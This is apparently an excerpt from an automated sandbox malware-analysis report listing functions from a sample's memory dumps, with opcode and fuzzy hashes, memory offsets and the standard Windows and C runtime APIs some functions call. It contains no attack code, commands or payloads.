                                                                                                                  • Instruction ID: 364599400747ee7737b3f8edebdd0c685cbb6ae4303c29290f9d1517d1107c91
                                                                                                                  • Opcode Fuzzy Hash: 73c2251d5b117e9408f90c5b3ce93738cae8b9a8f8a6aacaeafa211465aa56b8
                                                                                                                  • Instruction Fuzzy Hash: 56019235E00249EFCF18AF74C848AAE7BB5FB88361F404539E95693350DB3489158BA4
                                                                                                                  Function 2410D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1cd5b2b09505d31359d59e7067bbbce9aa6241e652d4d2fd9a57c918d8781bdf
                                                                                                                  • Instruction ID: 4d1259de38dba420dec8783a9cc71f1b24cb6b66d4b7ea84e05fe541ca7c6ed5
                                                                                                                  • Opcode Fuzzy Hash: 1cd5b2b09505d31359d59e7067bbbce9aa6241e652d4d2fd9a57c918d8781bdf
                                                                                                                  • Instruction Fuzzy Hash: 900126715083009EE3104B21ECC0B97BFD8DF45325F14C49AED4C0F28AC67A9A46CAB6
                                                                                                                  Function 29953600 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2559f0332942455a72fce1b299b7a92ab67e334c5203a6426fe2263752a551
                                                                                                                  • Instruction ID: 225168ad5eadd60e32eb7b4e3c3c7aed43e2827d435e56b1608e30c2d551b552
                                                                                                                  • Opcode Fuzzy Hash: 6e2559f0332942455a72fce1b299b7a92ab67e334c5203a6426fe2263752a551
                                                                                                                  • Instruction Fuzzy Hash: 4D01DB72601159AFCB15CE659C05BEF3BA6DFC4350F14806DF559C7380D675C916CB50
                                                                                                                  Function 2410D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f609c52459b7516eb3bddc07d10ae5daef91436ded889c285cb987d289db88fe
                                                                                                                  • Instruction ID: 43a21d4b22d1dc684bb5b490633fd2ad9b27c5c8ae6a694d6f171c31432f09c8
                                                                                                                  • Opcode Fuzzy Hash: f609c52459b7516eb3bddc07d10ae5daef91436ded889c285cb987d289db88fe
                                                                                                                  • Instruction Fuzzy Hash: 9C014C7140E3C09ED3128B219895B52BFB4DF43224F19C1DBD9888F1A7C2695949CB72
                                                                                                                  Function 29930FC8 Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bfae232810b2127af6f0602d8fbaf8d132de11d507cd30290a114c7dc8440d7
                                                                                                                  • Instruction ID: c80cd1363182d6f4828d6b81d36f3e42113dd34f865f0a98099b21584fdcc999
                                                                                                                  • Opcode Fuzzy Hash: 3bfae232810b2127af6f0602d8fbaf8d132de11d507cd30290a114c7dc8440d7
                                                                                                                  • Instruction Fuzzy Hash: 05015E35A04259EFCF28EF79D8449AE7BB5FF88361F404139E85593250DB308915DFA1
                                                                                                                  Function 29932877 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9cfc0ddb07eeb7fa13a2032ebbf0d9e185380fd4ab4a7677e02eea017e7a8bd9
                                                                                                                  • Instruction ID: 09c4994b108bfaab3a5cb51f8f3325d70fd58b8802bf37d6b14507d58e974a4b
                                                                                                                  • Opcode Fuzzy Hash: 9cfc0ddb07eeb7fa13a2032ebbf0d9e185380fd4ab4a7677e02eea017e7a8bd9
                                                                                                                  • Instruction Fuzzy Hash: 18F0F632B082609FC70A5B6EF41459EBBA9DFC563070840FBD444CB260DF36C802CB95
                                                                                                                  Function 29954378 Relevance: .0, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd406d15ffb66ebc7ee10ded3da7bb59050bb7b34a63d15baf56038560d02b8a
                                                                                                                  • Instruction ID: 3c6220cfad65ac3eb437cd2efa02ad0ff964d2d33c897d86f4958958de3fe593
                                                                                                                  • Opcode Fuzzy Hash: bd406d15ffb66ebc7ee10ded3da7bb59050bb7b34a63d15baf56038560d02b8a
                                                                                                                  • Instruction Fuzzy Hash: 8701A870E002199FCF44EFB9D954AAFBBF5AF49250F108569D519F7250E73899028BA0
                                                                                                                  Function 299320B8 Relevance: .0, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dea1d4b9bf1c96c094e2d0b678d3f87e417ff2cd66f3a09b8a0a36196ed9b6c0
                                                                                                                  • Instruction ID: 6408d5e6d7f06356ff22449a646654b93abfe97c71d4146c8bd79d7945ac6064
                                                                                                                  • Opcode Fuzzy Hash: dea1d4b9bf1c96c094e2d0b678d3f87e417ff2cd66f3a09b8a0a36196ed9b6c0
                                                                                                                  • Instruction Fuzzy Hash: EEF0C275E042089F8B60DFB988419AFBFF1AB98240B00422BE945D7241E7309A078BD2
                                                                                                                  Function 29954375 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cc9f29f652ec63b972781e31026fe88a3bccaf0f26a1267e4295ccd01fa5091b
                                                                                                                  • Instruction ID: c4e0c810bed590f39be1925bed5546835abdf251099d0c1fca50dc07ee902d32
                                                                                                                  • Opcode Fuzzy Hash: cc9f29f652ec63b972781e31026fe88a3bccaf0f26a1267e4295ccd01fa5091b
                                                                                                                  • Instruction Fuzzy Hash: 0301FB71E002199FCF84EFB9D9006AEBBF5AF48240F104569D419F7260E7388A028BA0
                                                                                                                  Function 29953EC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2692540252a31c119d661ab7935e2ff4b3d7fb7a4d1618c778242bacc6f1eba0
                                                                                                                  • Instruction ID: fec76feb62090decb793bcdd5f04e79d27b00cd7ad0213da5672887af4692f88
                                                                                                                  • Opcode Fuzzy Hash: 2692540252a31c119d661ab7935e2ff4b3d7fb7a4d1618c778242bacc6f1eba0
                                                                                                                  • Instruction Fuzzy Hash: E3F01C353101159FD708DA2AD859D2B3BEEEFC866570580A9F907CB361EE64DC028790
                                                                                                                  Function 29932570 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e0931585a73fc7a01b21d34aab33254e455762f55aa2957d6d566b115c870144
                                                                                                                  • Instruction ID: 05fef0af4b1fc28804c21b4876240afaa897fdfab71dd1e69b59aa4fc2ac8e48
                                                                                                                  • Opcode Fuzzy Hash: e0931585a73fc7a01b21d34aab33254e455762f55aa2957d6d566b115c870144
                                                                                                                  • Instruction Fuzzy Hash: 1AF03A353001059FC704CF59C494D5ABBAAFF887207508169FA0987331CB719D12CB50
                                                                                                                  Function 29932620 Relevance: .0, Instructions: 17COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 41fb10114fe34a74ac960a5edbd7f13924149771c7ed494c973aadcee1120e53
                                                                                                                  • Instruction ID: d905ecb76b848cbcffd47b82a3ac584050abe815243bb95bb7203670a2e9aa93
                                                                                                                  • Opcode Fuzzy Hash: 41fb10114fe34a74ac960a5edbd7f13924149771c7ed494c973aadcee1120e53
                                                                                                                  • Instruction Fuzzy Hash: A5D0C73A300154674B051A49D404DAE7B5FE7C9771704802AF90583340CF754D1597E5
                                                                                                                  Function 29953DB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0d390c0a7c4b19ac2e933b9963b9a24c43f94cd65c4c91557a2bf9486fedac7e
                                                                                                                  • Instruction ID: 98f603312612e81cb95715e0fbae7e703a13c1fc85b4dfd8428f651937767463
                                                                                                                  • Opcode Fuzzy Hash: 0d390c0a7c4b19ac2e933b9963b9a24c43f94cd65c4c91557a2bf9486fedac7e
                                                                                                                  • Instruction Fuzzy Hash: F2C0123444435A4BD545E761D885925375AE6C0201780AA10B8090E15DAEBC798E96A5
                                                                                                                  Function 29953E90 Relevance: .0, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0bf0a0c5548a3facabeefe94bb4fb960ac7493759b92284a2ca2a1f077143375
                                                                                                                  • Instruction ID: a7e8b72b537bc3a752d61b9aef787ce50a977b1ae552efeb6b69983520d4f2ea
                                                                                                                  • Opcode Fuzzy Hash: 0bf0a0c5548a3facabeefe94bb4fb960ac7493759b92284a2ca2a1f077143375
                                                                                                                  • Instruction Fuzzy Hash: 88D0C93518C3825FCB03DF34895D4897FA15A5220031945E2D080CF097E2288943C7D2

                                                                                                                  Non-executed Functions

                                                                                                                  Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2579439406-0
                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                  Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859560861-0
                                                                                                                  • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                  • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                  • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                  • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                  Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                  • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,241418F0), ref: 004170C5
                                                                                                                  • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                  • _malloc.LIBCMT ref: 0041718A
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                  • _malloc.LIBCMT ref: 0041724C
                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                  • __freea.LIBCMT ref: 004172A4
                                                                                                                  • __freea.LIBCMT ref: 004172AD
                                                                                                                  • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                  • ___convertcp.LIBCMT ref: 00417309
                                                                                                                  • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                  • _malloc.LIBCMT ref: 00417362
                                                                                                                  • _memset.LIBCMT ref: 00417384
                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                  • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                  • __freea.LIBCMT ref: 004173CF
                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3809854901-0
                                                                                                                  • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                  • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                  • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                  • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                  Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3886058894-0
                                                                                                                  • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                  • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                  • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                  • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                  Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                  Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _fseek_malloc_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 208892515-0
                                                                                                                  • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                  • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                  • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                  • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                  Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                  • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                  • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                  • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                  Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3016257755-0
                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                  • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                  • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89